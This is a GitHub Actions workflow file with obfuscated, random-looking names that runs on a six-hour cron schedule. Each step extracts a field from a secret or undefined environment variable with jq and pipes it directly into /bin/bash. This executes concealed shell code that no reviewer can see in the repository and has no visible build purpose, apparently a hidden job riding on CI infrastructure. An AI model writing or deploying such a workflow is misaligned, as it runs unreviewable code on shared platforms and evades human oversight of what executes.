name: mingyulu1837
on:
  workflow_dispatch:
  schedule:
    - cron: '40 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          hvtt62618: ${{ secrets.hvtt62618 }}
        run: |
          echo $hvtt62618 | jq -r .uke7075 | /bin/bash
          echo $zi4 | jq -r .uwst31816 | /bin/bash
          echo $i76 | jq -r .asr24839 | /bin/bash
          echo $qummz92526 | jq -r .w9 | /bin/bash

